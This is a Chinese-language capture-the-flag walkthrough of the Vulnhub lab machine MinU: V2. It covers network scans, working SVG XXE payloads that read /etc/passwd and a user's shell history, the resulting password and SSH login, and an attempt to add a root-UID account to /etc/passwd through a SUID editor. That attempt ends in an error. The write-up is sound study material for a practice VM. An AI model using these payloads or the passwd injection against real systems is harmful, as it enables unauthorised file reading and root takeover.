MinU: V2
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:e1:5d:d5 1 60 PCS Systemtechnik GmbH
192.168.56.138 08:00:27:4f:48:6b 1 60 PCS Systemtechnik GmbH
192.168.56.139 08:00:27:4f:48:6b 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.138
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.138 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-28 21:19 EST
Nmap scan report for bogon (192.168.56.138)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 82:33:25:61:27:97:ea:4a:49:f5:76:a3:33:1c:ae:2b (RSA)
| 256 ed:ca:f6:b9:b5:39:32:89:d0:a3:36:94:82:04:4a:e8 (ECDSA)
|_ 256 26:79:15:2e:be:93:02:41:04:c9:ea:e8:05:16:d1:83 (ED25519)
3306/tcp open mysql?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain
| Transfer-Encoding: chunked
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 404 Not Found
| X-Powered-By: Kemal
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <style type="text/css">
| body { text-align:center;font-family:helvetica,arial;font-size:22px;
| color:#888;margin:20px}
| max-width: 579px; width: 100%; }
| {margin:0 auto;width:500px;text-align:left}
| </style>
| </head>
| <body>
| <h2>Kemal doesn't know this way.</h2>
|_ <svg id="svg" version="1.1" width="400" height="400" viewBox="0 0 400 400" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" ><g id="svgg"><path id="path0" d="M262.800 99.200 L 262.800 150.400 265.461 150.400 L 268.121 150.400 267.864 144.300 C 267.722 140.945,267.510 120.110,267.391 98.000 C 267.273 75.890,267.074 55.595,266.948 52.900 L 266.719 48.000 264.760 48.000 L 262.800 48.000 262.800 99.200 M160.800 290.800 C 160.800 291.301,161.224 291.301,162.000
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_mysql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=12/28%Time=63ACF94D%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,6D,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain\r\nTransfer-Encoding:\x20chunked\r\n\r\n10\r\n400\x20Bad\x20
SF:Request\n\r\n0\r\n\r\n")%r(GetRequest,1C90,"HTTP/1\.0\x20404\x20Not\x20
SF:Found\r\nX-Powered-By:\x20Kemal\r\nContent-Type:\x20text/html\r\n\r\n\x
SF:20\x20<!DOCTYPE\x20html>\n\x20\x20<html>\n\x20\x20<head>\n\x20\x20\x20\
SF:x20<style\x20type=\"text/css\">\n\x20\x20\x20\x20body\x20{\x20text-alig
SF:n:center;font-family:helvetica,arial;font-size:22px;\n\x20\x20\x20\x20\
SF:x20\x20color:#888;margin:20px}\n\x20\x20\x20\x20img\x20{\x20max-width:\
SF:x20579px;\x20width:\x20100%;\x20}\n\x20\x20\x20\x20#c\x20{margin:0\x20a
SF:uto;width:500px;text-align:left}\n\x20\x20\x20\x20</style>\n\x20\x20</h
SF:ead>\n\x20\x20<body>\n\x20\x20\x20\x20<h2>Kemal\x20doesn't\x20know\x20t
SF:his\x20way\.</h2>\n\x20\x20\x20\x20<svg\x20id=\"svg\"\x20version=\"1\.1
SF:\"\x20width=\"400\"\x20height=\"400\"\x20viewBox=\"0\x200\x20400\x20400
SF:\"\x20xmlns=\"http://www\.w3\.org/2000/svg\"\x20xmlns:xlink=\"http://ww
SF:w\.w3\.org/1999/xlink\"\x20><g\x20id=\"svgg\"><path\x20id=\"path0\"\x20
SF:d=\"M262\.800\x2099\.200\x20L\x20262\.800\x20150\.400\x20265\.461\x2015
SF:0\.400\x20L\x20268\.121\x20150\.400\x20267\.864\x20144\.300\x20C\x20267
SF:\.722\x20140\.945,267\.510\x20120\.110,267\.391\x2098\.000\x20C\x20267\
SF:.273\x2075\.890,267\.074\x2055\.595,266\.948\x2052\.900\x20L\x20266\.71
SF:9\x2048\.000\x20264\.760\x2048\.000\x20L\x20262\.800\x2048\.000\x20262\
SF:.800\x2099\.200\x20M160\.800\x20290\.800\x20C\x20160\.800\x20291\.301,1
SF:61\.224\x20291\.301,162\.000")%r(HTTPOptions,3330,"HTTP/1\.0\x20404\x20
SF:Not\x20Found\r\nX-Powered-By:\x20Kemal\r\nContent-Type:\x20text/html\r\
SF:n\r\n\x20\x20<!DOCTYPE\x20html>\n\x20\x20<html>\n\x20\x20<head>\n\x20\x
SF:20\x20\x20<style\x20type=\"text/css\">\n\x20\x20\x20\x20body\x20{\x20te
SF:xt-align:center;font-family:helvetica,arial;font-size:22px;\n\x20\x20\x
SF:20\x20\x20\x20color:#888;margin:20px}\n\x20\x20\x20\x20img\x20{\x20max-
SF:width:\x20579px;\x20width:\x20100%;\x20}\n\x20\x20\x20\x20#c\x20{margin
SF::0\x20auto;width:500px;text-align:left}\n\x20\x20\x20\x20</style>\n\x20
SF:\x20</head>\n\x20\x20<body>\n\x20\x20\x20\x20<h2>Kemal\x20doesn't\x20kn
SF:ow\x20this\x20way\.</h2>\n\x20\x20\x20\x20<svg\x20id=\"svg\"\x20version
SF:=\"1\.1\"\x20width=\"400\"\x20height=\"400\"\x20viewBox=\"0\x200\x20400
SF:\x20400\"\x20xmlns=\"http://www\.w3\.org/2000/svg\"\x20xmlns:xlink=\"ht
SF:tp://www\.w3\.org/1999/xlink\"\x20><g\x20id=\"svgg\"><path\x20id=\"path
SF:0\"\x20d=\"M262\.800\x2099\.200\x20L\x20262\.800\x20150\.400\x20265\.46
SF:1\x20150\.400\x20L\x20268\.121\x20150\.400\x20267\.864\x20144\.300\x20C
SF:\x20267\.722\x20140\.945,267\.510\x20120\.110,267\.391\x2098\.000\x20C\
SF:x20267\.273\x2075\.890,267\.074\x2055\.595,266\.948\x2052\.900\x20L\x20
SF:266\.719\x2048\.000\x20264\.760\x2048\.000\x20L\x20262\.800\x2048\.000\
SF:x20262\.800\x2099\.200\x20M160\.800\x20290\.800\x20C\x20160\.800\x20291
SF:\.301,161\.224\x20291\.301,162\.000");
MAC Address: 08:00:27:4F:48:6B (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.49 seconds
NMAP扫描结果表明,目标主机有2个开放端口:22(SSH)、3306,3306虽然一般来说是Mysql,但是对于本目标主机来说运行http服务,用浏览器访问该端口可验证这一点。
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ curl http://192.168.56.138:3306
<!DOCTYPE html>
<html>
<head>
<style type="text/css">
body { text-align:center;font-family:helvetica,arial;font-size:22px;
color:#888;margin:20px}
img { max-width: 579px; width: 100%; }
#c {margin:0 auto;width:500px;text-align:left}
</style>
</head>
<body>
<h2>Kemal doesn't know this way.</h2>
kemal会不会是用户名?
访问/robots.txt文件,返回相同的内容。
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ nikto -h http://192.168.56.138:3306
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.138
+ Target Hostname: 192.168.56.138
+ Target Port: 3306
+ Start Time: 2022-12-28 21:31:20 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: Kemal
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
^C
Nikto工具没有返回任何结果。
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ gobuster dir -u http://192.168.56.138:3306 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.138:3306
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/12/28 21:35:29 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220552 / 220561 (100.00%)===============================================================
2022/12/28 21:36:40 Finished
===============================================================
Gobuster工具没有扫描出来任何目录,继续用gobuster工具扫描以下文件。
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ gobuster dir -u http://192.168.56.138:3306 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.138:3306
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,php,html,sh,js
[+] Timeout: 10s
===============================================================
2022/12/28 21:36:54 Starting gobuster in directory enumeration mode
===============================================================
/upload.html (Status: 200) [Size: 908]
太棒了,扫描出/upload.html文件。
访问该文件,用户可以上传文件,接下来的目标就是上传shell.php文件。
但是上传失败,返回: I'm a teapot
用burpsuite拦截请求,修改Content-type为image/svg也失败。即使上传其他图片格式,比如jpeg也失败。
这里使用svg xxe 注入 漏洞
https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ vim svgxee.svg
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ cat svgxee.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
将svgxee.svg文件上传
上传成功,查看返回的页面源代码可得到/etc/passwd文件内容
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500px" height="40px" version="1.1">root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
employee:x:1000:1000:Linux User,,,:/home/employee:/bin/ash
</svg>
Upload OK
看是否存在employee的私钥文件
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ cp svgxee.svg svgxee_sshprivate_key.svg
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ vim svgxee_sshprivate_key.svg
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ cat svgxee_sshprivate_key.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.ssh/id_rsa" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
上传svgxee_sshprivate_key.svg文件
没有得到期望的内容。
接下来看能否读到bash_history文件内容:
/home/employee/.bash_history
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ cp svgxee.svg svgxee_bashhistory.svg
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ vim svgxee_bashhistory.svg
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ cat svgxee_bashhistory.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.bash_history" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
上传svgxee_bashhistory.svg文件到目标主机。
并没有返回内容,但是需要注意从/etc/passwd文件内容可以知道employee的bash为ash
所以上述历史文件名称为/home/employee/.ash_history
──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ cp svgxee_bashhistory.svg svgxee_bashhistory2.svg
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ vim svgxee_bashhistory2.svg
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ cat svgxee_bashhistory2.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.ash_history" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
上传修改后的文件:
从返回页面的源代码可以知道:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "file:///home/employee/.ash_history">
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500px" height="40px" version="1.1">useradd -D bossdonttrackme -p superultrapass3
exit
</svg>
Upload OK
密码:superultrapass3, -D应该是描述,不是用户名。
因此该密码为employee的密码。
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ ssh [email protected]
[email protected]'s password:
_ ____
/\/\ (_)_ __ /\ /\__ _|___ \
/ \| | '_ \/ / \ \ \ / / __) |
/ /\/\ \ | | | \ \_/ /\ V / / __/
\/ \/_|_| |_|\___/ \_/ |_____|
minuv2:~$ id
uid=1000(employee) gid=1000(employee) groups=1000(employee)
minuv2:~$ sudo -l
-ash: sudo: not found
minuv2:~$
提权
minuv2:~$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/micro
/bin/bbsuid
minuv2:~$
这里经过尝试可以使用micro来编辑passwd文件,可以尝试提权操作。
本地生成密码对应的hash值
┌──(kali㉿kali)-[~/Vulnhub/MinUv2]
└─$ openssl passwd -1 -salt jason jason123
$1$jason$RQbSTyeo630mZzkaat1HQ/
将将下行添加到/etc/passwd:
jason:$1$jason$RQbSTyeo630mZzkaat1HQ/:0:0:root:/root:/bin/ash
minuv2:~$ /usr/bin/micro /etc/passwd
打开micro后按Alt-G键即可打开快捷键列表,如图所示。
Ctrl-Q退出,Ctrl-S存储,Ctrl-O打开文件,Ctrl-F查找,Ctrl-Z撤销操作,Ctrl-Y重新操作,Ctrl-A全选,Ctrl-T新开标签页。
没有列出的快捷键还有:
Shift加箭头选择文本,Ctrl-C拷贝,Ctrl-V粘贴,Ctrl-X剪切,PageUp上翻页,PageDown下翻页,Home行首,End行尾。
但是这里用/usr/bin/micro代开/etc/passwd文件,发现内容为空,用下面的方式打开并添加内容:
minuv2:~$ cat /etc/passwd | /usr/bin/micro
虽然成功将jason添加到/etc/passwd文件,但是切换到jason用户时报错:
minuv2:~$ su - jason
Password:
su: can't execute '/bin/as': No such file or directory
minuv2:~$
经验教训
-
micro是另一个linux下的编辑工具。
-
对于SVG文件,虽然也是图片,但是与jpeg等文件不同,可以通过XEE漏洞读取相关文件内容。